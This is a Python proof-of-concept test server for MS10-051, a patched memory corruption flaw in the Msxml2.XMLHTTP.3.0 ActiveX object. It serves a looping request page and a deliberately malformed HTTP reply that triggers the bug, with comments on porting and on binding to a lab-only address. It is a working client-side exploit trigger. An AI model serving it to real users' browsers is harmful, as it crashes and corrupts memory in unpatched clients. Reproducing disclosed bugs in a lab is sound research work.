Msxml2.XMLHTTP.3.0 Response Handling Memory Corruption (MS10-051)
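# Msxml2.XMLHTTP.3.0 Response Handling Memory Corruption (MS10-051)
#
# Sources:
#   http://skypher.com/index.php/2010/08/10/ms10-051/
#   http://code.google.com/p/skylined/issues/detail?id=17
#
# Minimal single-threaded HTTP test server for reproducing the issue named in
# the title against a browser under test. It serves two things:
#   * "/"            - an HTML page whose script repeatedly issues synchronous
#                      requests through the Msxml2.XMLHTTP.3.0 ActiveX object;
#   * "/RandomHTTP"  - a raw, deliberately malformed HTTP reply.
#
# The listing was originally Python 2 only (print statements,
# "except socket.error, e"). The forms used below are accepted by both
# Python 2.6+ and Python 3.
import os
import re
import socket

webserver_port = 28876

# Routing table: regular expression matched against the request path -> reply.
# A reply can be:
#   str      - sent to the client verbatim, with no status line or headers
#              added by this server;
#   tuple    - (mime_type, body), wrapped in a normal "200 OK" response;
#   callable - called with the path, returns (code, reason, mime_type, body).
replies = {
    r'^/$': ('text/html', """
<SCRIPT>
  iCounter = 0
  function go() {
    var request_url = location.protocol + "//" + location.host + "/RandomHTTP?counter=" + (iCounter++);
    var xml_http_request = new ActiveXObject("Msxml2.XMLHTTP.3.0");
    xml_http_request.open("GET", request_url, false);
    xml_http_request.send();
    setTimeout(go, 1);
  }
  go();
</SCRIPT>
"""),
    # Sent as the complete reply: a bare status line with no reason phrase,
    # no headers and no CRLF. Going by the title, the client's handling of
    # this response is what MS10-051 addresses.
    r'^/RandomHTTP\?counter=\d+$': 'HTTP 4\n',
}

server_socket = socket.socket()
server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# NOTE: '' listens on every interface, although the banner below says
# "localhost". On a shared network, bind to a lab-only address instead so the
# test page is not reachable from unrelated hosts.
server_socket.bind(('', webserver_port))
server_socket.listen(1)
print('Webserver running at http://localhost:%d/' % webserver_port)

while True:
    client_socket, _ = server_socket.accept()
    # try/finally guarantees the connection is closed on every path; the
    # original leaked the socket when recv() failed and the loop continued.
    try:
        try:
            # latin-1 maps each byte to one character, so len() of the text
            # still equals the number of bytes on the wire.
            request = client_socket.recv(1024).decode('latin-1')
        except socket.error:
            print('>> ??')
            continue
        print('>> ' + request.split('\r\n')[0])

        # Only "GET <path> ..." request lines are understood; anything else
        # leaves path as None and falls through to the 404 defaults.
        path = None
        if request[:4] == 'GET ':
            end_path = request.find(' ', 4)
            if end_path != -1:
                path = request[4:end_path]

        code, reason, mime_type, body = 404, 'Not found', 'text/plain', 'Not found'
        response = None
        if path is not None:
            for path_regexp, reply in replies.items():
                if re.match(path_regexp, path):
                    if isinstance(reply, str):
                        # Raw reply: bypasses the header construction below.
                        response = reply
                    elif isinstance(reply, tuple):
                        code, reason = 200, 'OK'
                        mime_type, body = reply
                    else:
                        code, reason, mime_type, body = reply(path)
                    break

        if response is None:
            # Fixed past Date/Expires values plus the no-cache headers keep
            # the client from reusing a cached copy between requests.
            response = '\r\n'.join([
                'HTTP/1.1 %03d %s' % (code, reason),
                'Content-Type: %s' % mime_type,
                'Date: Sat Aug 28 1976 09:15:00 GMT',
                'Expires: Sat Aug 28 1976 09:15:00 GMT',
                'Cache-Control: no-cache, must-revalidate',
                'Pragma: no-cache',
                'Accept-Ranges: bytes',
                'Content-Length: %d' % len(body),
                '',
                body,
            ])
        print('<< %s (%d bytes %s)' %
              (response.split('\r\n')[0], len(response), mime_type))

        try:
            # sendall() retries until the whole reply is written; send() may
            # stop after a partial write and silently truncate the reply.
            client_socket.sendall(response.encode('latin-1'))
        except socket.error:
            # Best effort: the client may already have gone away.
            pass
    finally:
        client_socket.close()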